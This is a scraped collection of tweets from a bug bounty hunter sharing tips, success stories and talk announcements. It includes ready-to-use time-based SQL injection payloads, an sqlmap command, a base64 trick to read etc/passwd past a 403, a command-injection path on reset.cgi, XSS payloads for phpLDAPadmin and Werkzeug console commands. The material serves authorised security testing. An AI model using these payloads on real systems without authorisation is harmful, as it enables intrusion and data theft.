7 SQLs
4 in php
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
1 in aspx
orwa';%20waitfor%20delay%20'0:0:6'%20--%20
2 in graphql
orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))--
#bugbountytips
#bugbountytip
💕
For first time i found a SQL Injection On **sitemap.xml** endpoint 😎😎
#bugbountytips
#bugbountytip
target[.]com/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)#
sleep payload
[1;SELECT IF((8303>8302),SLEEP(9),2356)#] = 9s
Happy Hunting
#BugBounty
url/?f=etc/passwd ==> 403
encode etc/passwd as base64
url/?f=L2V0Yy9wYXNzd2Q= ==> 200
#note
you can use this trick in SQL , SSTI , XSS , LFI , Etc...
#bugbountytips
#bugbountytip
Burp Ex
403 Bypasser
5GC API Parser
Active Scan++
Backslash Powered Scanner
CO2
IP Rotate
J2EEScan
JS Link Finder
JS Miner
Logger++
Log Viewer
GAP
Distribute Damage
IIS Tilde
Look Over There
Param Miner
Software Vulnerability Scanner
SAML Raider
Autorize
Encode IP
Asset Discovery
Slides of my talk in bsidesodisha
about
•Build your setup for hunting
Tools , Extensions , Etc…
• Quick Orwa Methodology 2023
• SQL Injection
• and for sure
#bugbountytips
feel free to ask about anything in comment and will try explained ❤️❤️
Add this endpoint for you wordlist
phpldapadmin/index.php
and try get default login
and if there's no luck
try this 2 XSSs
domain/phpldapadmin/cmd.php
domain/cmd.php
1/2
#bugbountytips
#bugbountytip
I was working with
r3aper__ for the last 6 months and I learned a lot from this amazing hunter
He start creating a write ups and this is the first one
Bypassing an Admin Panel with SQL Injection
#bugbountytips
I earned great bounty for my submission on
@bugcrowd
#ItTakesACrowd
#bugbountytips
#bugbountytip
Werkzeug frameworks that has dubug enabled so I was able to access to target[.]com/console endpoint
python os commands
>>> import os
>>> os.listdir('/')
Happy hunting
story of very quick RCE
Target/cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
You can to add this paths for ur wordlist
cgi-bin/dmt/reset.cgi?db_prefix=%26id%26
cgi-bin/reset.cgi?db_prefix=%26id%26
fuzzing as well
cgi-bin/FUZZ.cgi?FUZZ=%26id%26
#bugbountytips
❤️
Today I completed 150 accepted SQL Injection reports just on
@Bugcrowd
There’s a other SQLs on H1, Meta,external programs
I am happy that I got this amazing number of sql injection discoveries just in 2 years with 0 experience in all security stuff
I did it , you can do it✌️
I start hunting on this BMW program
03:00AM in 03:20AM i submitted the first SQL injection
Now Iam going to made something new
will pickup a 5-15 random hunter from my comments
and will try get 5-15 critical/exceptional
and invite one collab 50% for each submission
1
located SQL in specific parameter by this sleep payload
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
2
with waf not able to exploited via SQLmap
3
i got the origin IP
then in match & replace in burp
1/2
#bugbountytip
#bugbountytips
i found phpmyadmin template on nuclei
phpmyadmin-setup.yaml
next step edit that template for
/admin/
template endpoint was [/pma/setup/index.php]
i found 2 on [/admin/pma/setup/index.php]
happy hunting ♥
#BugBounty
& I earned $4,000 also for my submission on
@bugcrowd
#ItTakesACrowd
Both of bugs it was a Unauthorized access to open dashboards
#bugbountytips
Scan ports top 1000 everyday , everyday
naabu -list sub.txt -top-ports 1000 -exclude-ports 80,443 -o file
Old but gold
#bugbountytip
add this for your world list
.svn/entries
or edit on the ready template
Ex:
admin/.svn/entries
next step if you locate the svn configuration
use svn-extractor
start looking for bugs in the source
Just noticed that I am in Leaderboard (All time) top 10 for the P1s reports on
@Bugcrowd
and Iam very happy to share this with you all
Iam not that very smart hacker , and still there’s a lot to learn,
so I assure you
(if I did it, you can do it) never give up ❤️
Who's is excited…
Who's missing some bugbounty tips..
Will be with
@NahamSec
in
#nahamcon
this year set up you reminder on this date
There’s a live with new
#bugbountytips
at
#NahamCon
on June 17th
This talk will be free , no subscription required
Github
#bugbountytip
#bugbountytips
target[.]my[.]salesforce[.]com password
you can find a passwords
but when you try login its will ask for 2fa
how you can bypass that and get critical find
1/2
Happy hunting all ♥
Why do they keep telling me that 🤣🤣
i know and i like it
easy P1
#bugbountytips
#bugbountytip
for Unauthorized access
replace my name with your domain name
==>
on tap Associated Urls ==> show as 100 entries
and start have nice day with that
Let’s made something new
Let’s keep this tweet for question’s
You can ask me here in a comment and will answers in a comment , and let’s everyone learn and found some useful questions/answers
keep this tweet as reference by re-tweet
#bugbounty
#bugbountytips
#questions
✌️
When they asked a little girl from Palestine
What will you be when you grow up??
She said we never grow old, we die before 12 years old….
Completely true
Perfect post about SQLI
add for that
* change the request method and inject again
* inject in the url it self
example
target/admin/1SQLPayload/xxxx
*Inject the parameter it self in post request
example
userSQLpayload=admin&password=admin
#bugbountytip
#bugbountytips
for that i collect a huge number of bounty programs
here
you can download all of that as git clone ...
cd x
cat * > 1-file.txt
and now you have everything in 1 file about 165K target
cat 1-file.txt | nuclei -t your-privte-template.yaml
#bugbountytips
If you found any bug by your testing
create a nuclei template for that and start testing that template on everything
You can test that on everything
XSS,SQL,Info Dis, Etc..
also any
#bugbountytip
about some endpoint
you can create a template by tat and test it
#bugbounty
❌Loaded my first critical bug for 2024 on
public bounty program on
@Hacker0x01
(Triaged)
❌Loaded my first critical/exceptional bug for 2024 on
public bounty program on
@intigriti
(Triaged)
❌Loaded my first P1 bug for 2024 on
public bounty program on
@Bugcrowd
(Pending)
😍
Funny
#bugbounty
story 😬
I found a critical bug on bug bounty program on
@Bugcrowd
and that bug affect on a other bounty program on
@Hacker0x01
the 2 programs are public , I sent the same report twice, one here and one here
and yes I rewarded on the 2 programs 😎😎😎
Email From Bounty Program About
(New Target Added)
4-5 min later => P1 for a Auth Bypass….
Sometimes you find out that you are like the hackers in the movies🤣
I back with new account same username handle
@GodfatherOrwa
So all who know me you can follow me again 😂
And from today
A lot of
#bugbountytips
#bugbountytip
And lts get back and make it rain P1s✌️
P1 $6500
P2 $3000
P3 no bounty
Critical auth bypass mark as P3
Default credentials & LDAP injection mark as P3
Program keep changing P1s to P3s to save budget
And changing of P3s all the time after take down the hosts
This is called commercial fraud 🤣
Sad story’s 🤣
For who asking about sqlmap command in this case
sqlmap -u "target/sitemap.xml?offset=1" -p offset --level 5 --risk 3 --dbms=MySQL --hostname --test-filter="MySQL >= 5.0.12 stacked queries"
i received some questions to speak about in
@bsidesahmedabad
so i added to my talk in the [Power Of Recon]
1 my method to bypass waf
2 my method to get more subdomains
3 my method to find more domains / 3rd patys / endpoints
#bugbountytips
We're rolling out the red carpet as the
#BuggyAwards
are back! 🐛🏆
Help us recognize those who have gone above and beyond in their security efforts! 🔥
Don't miss this👇
🔗:
Bug here i was access to symfony open profiler & toolbar access
that's led to chain of bugs such as [ auth bypass , auth LFI , unauth LFI , StoredXSS , Etc...]
for more info read about
Symfony web debug toolbar & Symfony Profiler open
#bugbountytips
If you found any bug by your testing
create a nuclei template for that and start testing that template on everything
You can test that on everything
XSS,SQL,Info Dis, Etc..
also any
#bugbountytip
about some endpoint
you can create a template by tat and test it
#bugbounty
I still remember first day when I asked
@XHackerx007
to collaborate with me on
#Fisglobal
program in (08 Sep 2021)
and from that date till today me & HackerX007 working fully on FIS , we still finding critical bugs
we can say that we know about FIS more than FIS employees
1/2
#BugBounty
#infosec
I Just Back 😎
My account has been closed by Twitter it’s self
After this, someone else took over my account
It wasn't hacked
It was something bad from Twitter
Twitter support very bad
The story:
1/5
cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(%27Orwa%27)%3C/ScRiPt%3E&meth=ajax&server_id=1
cmd.php?server_id=<script>alert('Orwa')</script>
you can also try replace cmd.php to index.php
2/2
Happy hunting
@Bugcrowd
Who’s asking about what wordlist I use
I use mostly
and
Important note all the time update your wordlist manually by adding interesting endpoints / dirs that you have
👾 Coming up next in our Tech Speaker series we have
@GodfatherOrwa
! 🎯 He is all set to enlighten us with his insights on "The Power of Recon."
🧑🏼💻 A distinguished security researcher, Bug Bounty Hunter and boasts impressive accolades as a Hack Cup and LevelUpX champion,
its the best time looking for 0Days,CVEs during Christmas holiday 😈
and yes first 0day (medium) has been located 👍
I'm working now on the second 0day (critical) ✌️
#bugbounty
guess what.....
let's do something new
besides that i'm going to speak tomorrow in
@bsidesahmedabad
don't be shy to catch me and talk to me , telling me where you stuck , in my turn i assure we will fix that by giving you personalized
#bugbountytip
/s
best wishes everyone♥
@HusseiN98D
All respect for u hussein
I donate 20% of every bounty I get to help poor people
In the past, I was suffering from poverty, so I could not complete my studies and did not obtain certificates
1/2
@amit___009
Continue fuzzing as example
Target/BPDEV_FUZZ
This wordlist will be helpful
And valid endpoint such as 403/301/302/200
Send it again to IIS scanner
@abdallah_osman4
@0x_rood
1 install waymore tool
-i domain -mode U
And send all the results to burp
2 start bing and google dorking on the same proxy browser to get all the results to burp
3 install GAP extension and then send the target to GAP
there’s lot to do, this start
@Jhaddix
@Bugcrowd
Hi sir , no your not alone 😊
This a screenshot from me last talk in Bsides I was talking about that
Playing with custom headers can bring a good results
This one it’s not about the bug it’s self
It’s about how you testing and never give up and keep testing and trying
You should keep this write up next to you when you hunt for ATO
Well done omar 👍👍
In arab community lot of people when they report a bug for VdP program they start making courses, and videos and tips , etc..
That’s why there’s tons of bad content for Arabic bug bounty
the best Arabic content I found ever till today is
@SirBagoza
content and I suggest that
@intigriti
It’s depends how you look for RCE
Some look for RCE as bug
Some look for RCE as impact
As example LFI to RCE (the bug is LFI and the Impact is RCE)
I look for RCE as impact not bug
& I automate on bugs that can led for RCEs